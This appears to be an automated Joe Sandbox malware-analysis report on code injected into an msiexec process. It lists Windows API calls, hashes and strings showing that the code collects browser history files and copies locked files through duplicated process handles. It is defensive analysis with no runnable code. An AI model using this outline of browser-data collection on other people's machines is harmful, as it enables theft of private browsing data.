                                                                                                        • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                        • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                        • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                        • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                        • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProcProcessTimes
                                                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                                                        • API String ID: 1714573020-3385500049
                                                                                                        • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                        • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                        • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                        • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004087D6
                                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                          • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                        • memset.MSVCRT ref: 00408828
                                                                                                        • memset.MSVCRT ref: 00408840
                                                                                                        • memset.MSVCRT ref: 00408858
                                                                                                        • memset.MSVCRT ref: 00408870
                                                                                                        • memset.MSVCRT ref: 00408888
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2911713577-0
                                                                                                        • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                        • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                        • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                        • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                        APIs
                                                                                                        • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp
                                                                                                        • String ID: @ $SQLite format 3
                                                                                                        • API String ID: 1475443563-3708268960
                                                                                                        • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                        • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                        • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                        • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmpqsort
                                                                                                        • String ID: /nosort$/sort
                                                                                                        • API String ID: 1579243037-1578091866
                                                                                                        • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                        • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                        • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                        • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040E60F
                                                                                                        • memset.MSVCRT ref: 0040E629
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        Strings
                                                                                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                        • API String ID: 3354267031-2114579845
                                                                                                        • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                        • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                        • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                        • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                        • API String ID: 2221118986-1725073988
                                                                                                        • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                        • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                        • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                        • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                        APIs
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                        • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$memcmp
                                                                                                        • String ID: $$8
                                                                                                        • API String ID: 2808797137-435121686
                                                                                                        • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                        • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                        • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                        • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                          • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                          • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                          • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                          • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                          • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                          • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                          • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                          • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                        • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                          • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                          • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                          • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                                        • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                        • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                          • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                          • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                          • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1979745280-0
                                                                                                        • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                        • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                        • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                        • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                        APIs
                                                                                                          • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                        • memset.MSVCRT ref: 00414C87
                                                                                                        • wcscpy.MSVCRT ref: 00414CFC
                                                                                                          • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                        Strings
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProcVersionmemsetwcscpy
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                        • API String ID: 4182280571-2036018995
                                                                                                        APIs
                                                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                        • memset.MSVCRT ref: 00403A55
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                        • String ID: history.dat$places.sqlite
                                                                                                        • API String ID: 2641622041-467022611
                                                                                                        APIs
                                                                                                          • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                        • GetLastError.KERNEL32 ref: 00417627
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$File$PointerRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 839530781-0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID: *.*$index.dat
                                                                                                        • API String ID: 1974802433-2863569691
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                        • GetLastError.KERNEL32 ref: 004175A2
                                                                                                        • GetLastError.KERNEL32 ref: 004175A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1156039329-0
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                        • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                                        • String ID:
                                                                                                        • API String ID: 3397143404-0
                                                                                                        APIs
                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                        • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 1125800050-0
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                        • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleSleep
                                                                                                        • String ID: }A
                                                                                                        • API String ID: 252777609-2138825249
                                                                                                        APIs
                                                                                                        • malloc.MSVCRT ref: 00409A10
                                                                                                        • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                        • free.MSVCRT ref: 00409A31
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: freemallocmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3056473165-0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: d
                                                                                                        • API String ID: 0-2564639436
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: BINARY
                                                                                                        • API String ID: 2221118986-907554435
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmp
                                                                                                        • String ID: /stext
                                                                                                        • API String ID: 2081463915-3817206916
                                                                                                        APIs
                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                        • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2445788494-0
                                                                                                        • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                        • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                        • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                        • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                        • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3150196962-0
                                                                                                        • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                        • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                        • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                        • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: malloc
                                                                                                        • String ID: failed to allocate %u bytes of memory
                                                                                                        • API String ID: 2803490479-1168259600
                                                                                                        • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                        • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                        • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                        • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0041BDDF
                                                                                                        • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmpmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1065087418-0
                                                                                                        • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                        • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                        • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                        • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                        APIs
